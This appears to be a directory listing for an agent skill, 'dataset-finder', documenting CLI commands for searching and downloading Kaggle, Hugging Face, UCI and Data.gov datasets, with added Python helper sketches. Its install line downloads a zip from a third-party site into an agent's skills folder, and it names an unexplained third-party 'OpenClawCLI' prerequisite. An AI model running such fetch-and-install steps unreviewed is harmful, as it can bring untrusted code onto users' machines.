dataset-finder

Name: dataset-finder
Author: openclaw

Use this skill when users need to search for datasets, download data files, or explore data repositories. Triggers include: requests to "find datasets", "search for data", "download dataset from Kaggle", "get data from Hugging Face", "find ML datasets", or mentions of data repositories like Kaggle, UCI ML Repository, Data.gov, or Hugging Face. Also use for previewing dataset statistics, generating data cards, or discovering datasets for machine learning projects. Requires OpenClawCLI installation from clawhub.ai.

Install

mkdir -p .claude/skills/dataset-finder && curl -L -o skill.zip "https://mcp.directory/api/skills/download/5555" && unzip -o skill.zip -d .claude/skills/dataset-finder && rm skill.zip

Installs to .claude/skills/dataset-finder

About this skill

Dataset Finder

Search, download, and explore datasets from multiple repositories including Kaggle, Hugging Face, UCI ML Repository, and Data.gov. Preview statistics, generate data cards, and manage datasets for machine learning projects.

⚠️ Prerequisite: Install OpenClawCLI (available for Windows and macOS).

Installation:

# Standard installation
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4

# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4

Never use --break-system-packages as it can damage your system's Python installation.
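To confirm that the packages above are visible to the interpreter you are actually running (for example, inside the virtual environment), a short standard-library check can look up each import name without importing it. The import names are the usual ones for these distributions (`huggingface-hub` imports as `huggingface_hub`, `beautifulsoup4` as `bs4`). Using `importlib.util.find_spec` rather than `import` avoids running the `kaggle` package, which in many versions tries to authenticate as soon as it is imported. The helper name `missing_packages` is illustrative, not part of the skill.

```python
import importlib.util

# pip distribution name -> top-level import name
REQUIRED = {
    "kaggle": "kaggle",
    "datasets": "datasets",
    "pandas": "pandas",
    "huggingface-hub": "huggingface_hub",
    "requests": "requests",
    "beautifulsoup4": "bs4",
}


def missing_packages(required=REQUIRED):
    """Return the pip names whose import name cannot be located.

    find_spec only locates a top-level module; it does not execute it,
    so packages with import-time side effects are not triggered.
    """
    return [pip_name for pip_name, module in required.items()
            if importlib.util.find_spec(module) is None]


if __name__ == "__main__":
    missing = missing_packages()
    if missing:
        print("Missing, install with pip:", " ".join(missing))
    else:
        print("All dependencies found.")
```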

Quick Reference

Task	Command
Search Kaggle	`python scripts/dataset.py kaggle search "housing prices"`
Download Kaggle dataset	`python scripts/dataset.py kaggle download "username/dataset-name"`
Search Hugging Face	`python scripts/dataset.py huggingface search "sentiment"`
Download HF dataset	`python scripts/dataset.py huggingface download "dataset-name"`
Search UCI ML	`python scripts/dataset.py uci search "classification"`
Preview dataset	`python scripts/dataset.py preview dataset.csv`
Generate data card	`python scripts/dataset.py datacard dataset.csv --output README.md`
List local datasets	`python scripts/dataset.py list`
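The commands in the table share a `<source> <action> <target>` shape plus a few local commands. The source of `scripts/dataset.py` is not shown here, so the following is only a hypothetical `argparse` layout that would accept the same command lines; the subcommand names come from the table, while the `--max-results` default of 20 is an assumption.

```python
import argparse


def build_parser():
    """Hypothetical parser mirroring the command shapes in the Quick Reference."""
    parser = argparse.ArgumentParser(prog="dataset.py")
    sub = parser.add_subparsers(dest="command", required=True)

    # Repository commands: <source> <action> <query-or-dataset-id>
    for source in ("kaggle", "huggingface", "uci", "datagov"):
        src = sub.add_parser(source)
        src.add_argument("action", choices=["search", "download", "list"])
        src.add_argument("target", help="search query or dataset identifier")
        src.add_argument("--max-results", type=int, default=20)  # assumed default

    # Local commands operate on files instead of a remote repository.
    preview = sub.add_parser("preview")
    preview.add_argument("files", nargs="+")

    datacard = sub.add_parser("datacard")
    datacard.add_argument("files", nargs="+")
    datacard.add_argument("--output")

    sub.add_parser("list")
    return parser
```

Keeping each repository as its own subparser lets repository-specific flags (such as Kaggle's `--file-type` or Hugging Face's `--split`) be added to one source without affecting the others.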

Core Features

1. Multi-Repository Search

Search across multiple data repositories from a single interface.

Supported Sources:

Kaggle - ML competitions and community datasets
Hugging Face - NLP, vision, and audio datasets
UCI ML Repository - Classic ML datasets
Data.gov - US government open data
Local - Manage downloaded datasets
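Searching several repositories from one interface implies normalizing their results into a common shape and merging them. The sketch below shows one way to do that under stated assumptions: the `SearchResult` record and `merge_results` helper are hypothetical, duplicates are detected by URL, and results are ranked by reported downloads (sources that do not report downloads sort last).

```python
from dataclasses import dataclass


@dataclass
class SearchResult:
    """Hypothetical common record for results from any repository."""
    source: str      # e.g. "kaggle", "huggingface", "uci", "datagov"
    title: str
    url: str
    downloads: int = 0  # 0 when the source does not report downloads


def merge_results(*result_lists, limit=10):
    """Combine per-source results, drop duplicate URLs, rank by downloads."""
    seen = set()
    merged = []
    for results in result_lists:
        for result in results:
            if result.url not in seen:
                seen.add(result.url)
                merged.append(result)
    # Python's sort is stable even with reverse=True, so ties keep
    # the order in which the sources were passed in.
    merged.sort(key=lambda r: r.downloads, reverse=True)
    return merged[:limit]
```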

2. Dataset Download

Download datasets with automatic format detection.

Supported formats:

CSV, TSV
JSON, JSONL
Parquet
Excel (XLSX, XLS)
ZIP archives
HDF5
Feather
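Automatic format detection can start from the file extension and fall back to the leading "magic" bytes that the binary formats above write at the start of every file (text formats such as CSV and JSON have no signature, so they rely on the extension). This is a minimal sketch, not the skill's actual detector; the function name `detect_format` is illustrative. Note that `.xlsx` files are ZIP containers, so without an extension they are reported as `zip`.

```python
from pathlib import Path

# Leading bytes of the binary formats listed above.
MAGIC = [
    (b"PAR1", "parquet"),
    (b"\x89HDF\r\n\x1a\n", "hdf5"),
    (b"ARROW1", "feather"),  # Feather v2 is the Arrow IPC file format
    (b"FEA1", "feather"),    # legacy Feather v1
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "xls"),  # OLE2 container
    (b"PK\x03\x04", "zip"),  # also the container used by .xlsx
]

EXTENSIONS = {
    ".csv": "csv", ".tsv": "tsv", ".json": "json", ".jsonl": "jsonl",
    ".parquet": "parquet", ".xlsx": "xlsx", ".xls": "xls", ".zip": "zip",
    ".h5": "hdf5", ".hdf5": "hdf5", ".feather": "feather",
}


def detect_format(path):
    """Guess a file's format from its extension, falling back to magic bytes."""
    path = Path(path)
    ext = path.suffix.lower()
    if ext in EXTENSIONS:
        return EXTENSIONS[ext]
    with path.open("rb") as fh:
        head = fh.read(8)  # the longest signature above is 8 bytes
    for magic, fmt in MAGIC:
        if head.startswith(magic):
            return fmt
    return "unknown"
```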

3. Dataset Preview

Get quick statistics and insights without loading entire datasets.

Preview features:

Shape (rows × columns)
Column names and types
Missing value counts
Basic statistics (mean, std, min, max)
Memory usage
Sample rows
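One way to compute most of these preview values without loading the whole file is a single streaming pass that keeps only per-column counters and the first few rows. The sketch below does this for CSV with the standard `csv` module; it is an illustration, not the skill's implementation. Assumptions: empty strings count as missing, and a column is treated as categorical as soon as one value fails to parse as a number. Memory usage is not estimated here.

```python
import csv


def preview_csv(fh, sample_size=5):
    """Single pass over a CSV: shape, missing counts, numeric stats, sample rows."""
    reader = csv.DictReader(fh)
    columns = list(reader.fieldnames or [])
    missing = {col: 0 for col in columns}
    ranges = {col: None for col in columns}  # col -> [min, max, total, count]
    categorical = set()
    sample, n_rows = [], 0
    for row in reader:
        n_rows += 1
        if len(sample) < sample_size:
            sample.append(row)
        for col in columns:
            value = row.get(col)
            if value is None or value == "":
                missing[col] += 1
                continue
            if col in categorical:
                continue
            try:
                x = float(value)
            except ValueError:
                categorical.add(col)  # first non-numeric value marks the column
                continue
            acc = ranges[col]
            if acc is None:
                ranges[col] = [x, x, x, 1]
            else:
                acc[0] = min(acc[0], x)
                acc[1] = max(acc[1], x)
                acc[2] += x
                acc[3] += 1
    numeric = {col: {"min": acc[0], "max": acc[1], "mean": acc[2] / acc[3]}
               for col, acc in ranges.items()
               if acc is not None and col not in categorical}
    return {"shape": (n_rows, len(columns)), "missing": missing,
            "numeric": numeric, "sample": sample}
```

To use it on a real file, open the file with `newline=""` (as the `csv` module documentation recommends) and pass the handle to `preview_csv`.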

4. Data Card Generation

Automatically generate dataset documentation.

Includes:

Dataset description
Schema information
Statistics summary
Usage examples
License information
Citation details
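A data card is essentially a Markdown document assembled from metadata. The following minimal sketch renders a few of the sections listed above from plain Python values; the function name, its parameters, and the exact layout are assumptions for illustration and are not the skill's generator.

```python
def render_data_card(name, description, columns, license_name, citation=None):
    """Render a minimal Markdown data card.

    `columns` is a list of (column, dtype, missing_count) tuples.
    """
    lines = [
        f"# Dataset Card: {name}",
        "",
        "## Dataset Description",
        description,
        "",
        "## Schema",
        "| Column | Type | Missing |",
        "|--------|------|---------|",
    ]
    # One table row per column tuple.
    lines += [f"| {col} | {dtype} | {missing} |" for col, dtype, missing in columns]
    lines += ["", "## License", license_name]
    if citation:  # the Citation section is optional
        lines += ["", "## Citation", citation]
    return "\n".join(lines) + "\n"
```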

Repository-Specific Commands

Kaggle

Search and download datasets from Kaggle.

Setup:

Get Kaggle API credentials from https://www.kaggle.com/settings
Place kaggle.json in ~/.kaggle/ (Linux/Mac) or %USERPROFILE%\.kaggle\ (Windows)
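Before running Kaggle commands, it can help to verify the credentials locally. The sketch below checks the usual places the Kaggle API reads from: the `KAGGLE_USERNAME`/`KAGGLE_KEY` environment variables, a directory named by `KAGGLE_CONFIG_DIR`, and otherwise `~/.kaggle/kaggle.json` (on Windows `Path.home()` resolves to `%USERPROFILE%`). The exact lookup order is an assumption based on the Kaggle API's documented behavior, and `kaggle_credentials_problems` is a hypothetical helper. On Linux/macOS the Kaggle client warns when the token is readable by other users, hence the permission check.

```python
import json
import os
import stat
from pathlib import Path


def kaggle_credentials_problems(config_dir=None):
    """Return a list of problems with the Kaggle credentials (empty list = OK)."""
    # Environment variables, when both are set, are used instead of the file.
    if os.environ.get("KAGGLE_USERNAME") and os.environ.get("KAGGLE_KEY"):
        return []
    config_dir = Path(config_dir or os.environ.get("KAGGLE_CONFIG_DIR")
                      or Path.home() / ".kaggle")
    token = config_dir / "kaggle.json"
    if not token.is_file():
        return [f"{token} not found"]
    try:
        data = json.loads(token.read_text())
    except json.JSONDecodeError:
        return [f"{token} is not valid JSON"]
    problems = [f"{token} has no '{field}' field"
                for field in ("username", "key") if not data.get(field)]
    # On POSIX systems the token should be readable by its owner only (chmod 600).
    if os.name == "posix" and token.stat().st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        problems.append(f"{token} is accessible to other users; run chmod 600")
    return problems
```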

# Search datasets
python scripts/dataset.py kaggle search "house prices"

# Search with filters
python scripts/dataset.py kaggle search "NLP" --file-type csv --sort-by hotness

# Download dataset
python scripts/dataset.py kaggle download "zillow/zecon"

# Download specific files
python scripts/dataset.py kaggle download "username/dataset" --file "train.csv"

# List dataset files
python scripts/dataset.py kaggle list "username/dataset-name"

Search options:

--file-type - Filter by file type (csv, json, etc.)
--license - Filter by license type
--sort-by - Sort by hotness, votes, updated, or relevance
--max-results - Limit number of results

Output:

1. House Prices - Advanced Regression Techniques
   Owner: zillow/zecon
   Size: 1.5 MB
   Last updated: 2023-06-15
   Downloads: 150,000+
   URL: https://www.kaggle.com/datasets/zillow/zecon

2. Housing Prices Dataset
   Owner: username/housing-data
   Size: 850 KB
   Last updated: 2023-08-20
   Downloads: 50,000+
   URL: https://www.kaggle.com/datasets/username/housing-data

Hugging Face Datasets

Search and download datasets from Hugging Face Hub.

# Search datasets
python scripts/dataset.py huggingface search "sentiment analysis"

# Search with filters
python scripts/dataset.py huggingface search "NLP" --task text-classification --language en

# Download dataset
python scripts/dataset.py huggingface download "imdb"

# Download specific split
python scripts/dataset.py huggingface download "imdb" --split train

# Download specific configuration
python scripts/dataset.py huggingface download "glue" --config mrpc

# Stream large datasets
python scripts/dataset.py huggingface download "large-dataset" --streaming
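These download flags line up with the arguments of `datasets.load_dataset`: the dataset ID is the first positional argument, the configuration (such as `mrpc` for `glue`) is the second, and `split` and `streaming` are keyword arguments. The helper below is a hypothetical translation layer that only builds the arguments, so it runs without the `datasets` package or network access; it is not the skill's code.

```python
def hf_load_args(dataset_id, config=None, split=None, streaming=False):
    """Translate the download flags into datasets.load_dataset arguments.

    Returns (args, kwargs) for a call of the form load_dataset(*args, **kwargs).
    """
    args = [dataset_id] if config is None else [dataset_id, config]
    kwargs = {}
    if split is not None:
        kwargs["split"] = split
    if streaming:
        # Streaming returns an iterable dataset that reads records lazily
        # instead of downloading the whole dataset first.
        kwargs["streaming"] = True
    return args, kwargs
```

With `datasets` installed, `args, kwargs = hf_load_args("glue", config="mrpc")` followed by `load_dataset(*args, **kwargs)` corresponds to the `--config mrpc` command above.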

Search options:

--task - Filter by task (text-classification, translation, etc.)
--language - Filter by language code
--multimodal - Include multimodal datasets
--benchmark - Only benchmark datasets
--max-results - Limit results
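For search, the `huggingface_hub` client exposes `HfApi().list_datasets`. Recent releases accept `search`, `task_categories`, `language` and `limit` as keyword arguments; older releases used a separate filter object instead, so treat the exact parameter names as an assumption to check against your installed version. This sketch maps `--task`, `--language` and `--max-results` only; `--multimodal` and `--benchmark` are deliberately not mapped. The helper name is hypothetical.

```python
def hf_search_kwargs(query, task=None, language=None, max_results=20):
    """Keyword arguments for huggingface_hub.HfApi().list_datasets.

    Assumes a recent huggingface_hub release in which list_datasets accepts
    search, task_categories, language and limit directly.
    """
    kwargs = {"search": query, "limit": max_results}
    if task:
        kwargs["task_categories"] = task
    if language:
        kwargs["language"] = language
    return kwargs
```

Used as `for info in HfApi().list_datasets(**hf_search_kwargs("NLP", task="text-classification", language="en")): print(info.id)`, this would print the matching dataset IDs.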

Output:

1. IMDB Movie Reviews
   Dataset ID: imdb
   Tasks: sentiment-classification
   Languages: en
   Size: 84.1 MB
   Downloads: 1M+
   URL: https://huggingface.co/datasets/imdb

2. Stanford Sentiment Treebank
   Dataset ID: sst2
   Tasks: sentiment-classification
   Languages: en
   Size: 7.4 MB
   Downloads: 500K+
   URL: https://huggingface.co/datasets/sst2

UCI ML Repository

Search and download classic ML datasets.

# Search datasets
python scripts/dataset.py uci search "classification"

# Search by characteristics
python scripts/dataset.py uci search "regression" --min-samples 1000

# Download dataset
python scripts/dataset.py uci download "iris"

# Download with metadata
python scripts/dataset.py uci download "wine-quality" --include-metadata

Search options:

--task-type - Filter by task type (classification, regression, clustering)
--min-samples - Minimum number of instances
--min-features - Minimum number of features
--data-type - Filter by data type (tabular, text, image, time-series)
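Once dataset metadata has been fetched, these search options reduce to simple predicates over each record. The sketch below applies them to a hypothetical in-memory catalog; the sample counts and feature counts are taken from the example output in this section, while the `UciDataset` record and the `"tabular"` data type assigned to both entries are assumptions.

```python
from dataclasses import dataclass


@dataclass
class UciDataset:
    """Hypothetical metadata record for one UCI dataset."""
    id: str
    tasks: tuple
    samples: int
    features: int
    data_type: str = "tabular"  # assumed for both sample entries


CATALOG = [
    UciDataset("iris", ("classification",), 150, 4),
    UciDataset("wine-quality", ("classification", "regression"), 6497, 11),
]


def filter_uci(catalog, task_type=None, min_samples=0, min_features=0,
               data_type=None):
    """Return IDs of datasets matching every option that was given."""
    return [d.id for d in catalog
            if (task_type is None or task_type in d.tasks)
            and d.samples >= min_samples
            and d.features >= min_features
            and (data_type is None or d.data_type == data_type)]
```

For example, the `--task-type regression --min-samples 1000` combination keeps only `wine-quality`.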

Output:

1. Iris Dataset
   ID: iris
   Task: classification
   Samples: 150
   Features: 4
   Classes: 3
   Missing values: No
   URL: https://archive.ics.uci.edu/ml/datasets/iris

2. Wine Quality
   ID: wine-quality
   Task: classification/regression
   Samples: 6497
   Features: 11
   Missing values: No
   URL: https://archive.ics.uci.edu/ml/datasets/wine+quality

Data.gov

Search US government open data.

# Search datasets
python scripts/dataset.py datagov search "census"

# Search with organization filter
python scripts/dataset.py datagov search "health" --organization "cdc.gov"

# Search by topic
python scripts/dataset.py datagov search "education" --tags "schools,students"

# Download dataset
python scripts/dataset.py datagov download "dataset-id"

Search options:

--organization - Filter by publishing organization
--tags - Filter by tags (comma-separated)
--format - Filter by format (csv, json, xml, etc.)
--max-results - Limit results
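catalog.data.gov runs on CKAN, whose `package_search` action accepts a free-text `q`, a Solr filter query `fq`, and a `rows` limit. The sketch below builds such a URL from the options above without making a request. Two assumptions to verify: the organization filter must use Data.gov's internal organization name, which may differ from a domain like `cdc.gov`, and the `res_format` values are assumed to be upper-case (for example `CSV`). The helper name is hypothetical.

```python
from urllib.parse import urlencode

# CKAN's search endpoint on catalog.data.gov.
CKAN_SEARCH = "https://catalog.data.gov/api/3/action/package_search"


def datagov_search_url(query, organization=None, tags=None, fmt=None,
                       max_results=10):
    """Build a package_search URL for the Data.gov search options."""
    filters = []
    if organization:
        filters.append(f'organization:"{organization}"')
    for tag in (tags.split(",") if tags else []):  # comma-separated, as in --tags
        filters.append(f'tags:"{tag.strip()}"')
    if fmt:
        filters.append(f'res_format:"{fmt.upper()}"')
    params = {"q": query, "rows": max_results}
    if filters:
        params["fq"] = " AND ".join(filters)
    return f"{CKAN_SEARCH}?{urlencode(params)}"
```

A CKAN response is JSON whose `result["results"]` list holds one entry per dataset, so `requests.get(url).json()["result"]["results"]` would give the matches.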

Output:

1. 2020 Census Demographic Data
   Organization: census.gov
   Format: CSV
   Size: 125 MB
   Last updated: 2023-01-15
   Tags: census, demographics, population
   URL: https://catalog.data.gov/dataset/...

Dataset Management

Preview Datasets

Get quick insights without loading entire datasets.

# Basic preview
python scripts/dataset.py preview data.csv

# Detailed statistics
python scripts/dataset.py preview data.csv --detailed

# Custom sample size
python scripts/dataset.py preview data.csv --sample 20

# Multiple files
python scripts/dataset.py preview train.csv test.csv

Output:

Dataset: train.csv
Shape: 1000 rows × 15 columns
Size: 2.5 MB
Memory usage: 120 KB

Columns:
  - id (int64): no missing values
  - name (object): 5 missing values
  - age (int64): no missing values
  - income (float64): 12 missing values
  - category (object): no missing values

Numeric columns statistics:
           age       income
count   1000.0       988.0
mean      35.2     65432.1
std       12.5     25000.0
min       18.0     20000.0
max       75.0    150000.0

Categorical columns:
  - category: 5 unique values
  - name: 995 unique values

Sample (first 5 rows):
   id       name  age   income  category
0   1   John Doe   35  65000.0         A
1   2   Jane Doe   28  55000.0         B
2   3  Bob Smith   42  85000.0         A
...

Generate Data Cards

Create standardized dataset documentation.

# Generate data card
python scripts/dataset.py datacard dataset.csv --output DATACARD.md

# Include statistics
python scripts/dataset.py datacard dataset.csv --include-stats --output README.md

# Custom template
python scripts/dataset.py datacard dataset.csv --template custom_template.md

# Multiple datasets
python scripts/dataset.py datacard train.csv test.csv --output-dir datacards/
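The `--template` option implies filling placeholders in a user-supplied Markdown file. The skill's placeholder syntax is not documented here, so this sketch assumes `$name`-style placeholders and uses the standard library's `string.Template`; `safe_substitute` leaves any unknown placeholder in place instead of raising an error. The template text and field names are hypothetical.

```python
from string import Template

# Hypothetical template; the placeholder names are an assumption.
DEFAULT_TEMPLATE = (
    "# Dataset Card: $name\n\n"
    "- **Format:** $fmt\n"
    "- **Rows:** $rows\n"
    "- **Columns:** $columns\n"
)


def fill_template(template_text, **fields):
    """Fill $placeholders; unknown placeholders are left untouched."""
    return Template(template_text).safe_substitute(**fields)
```

Leaving unknown placeholders visible makes it easy to spot fields a custom template expects but the generator did not provide.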

Generated data card includes:

Dataset description
File information (size, format, rows, columns)
Schema (column names, types, descriptions)
Statistics (distributions, missing values, correlations)
Sample data
Usage examples
License and citation
Known issues/limitations

Example output (DATACARD.md):

# Dataset Card: Housing Prices

## Dataset Description
This dataset contains housing prices and features for regression analysis.

## Dataset Information
- **Format:** CSV
- **Size:** 1.2 MB
- **Rows:** 1,460
- **Columns:** 81

## Schema
| Column | Type | Description | Missing |
|--------|------|-------------|---------|
| Id | int64 | Unique identifier | 0 |
| MSSubClass | int64 | Building class | 0 |
| LotArea | int64 | Lot size in sq ft | 0 |
| SalePrice | int64 | Sale price | 0 |
...

## Statistics
- Numerical features: 38
- Categorical features: 43
- Missing values: 19 columns affected
- Target variable: SalePrice (range: $34,900 - $755,000)

## Usage
```python
import pandas as pd
df = pd.read_csv('housing_prices.csv')
```

## License
Creative Commons

List Local Datasets

Manage downloaded datasets.

# List all datasets
python scripts/dataset.py list

# List with details
python scripts/dataset.py list --detailed

# Filter by source
python scripts/dataset.py list --so

---

*Content truncated.*
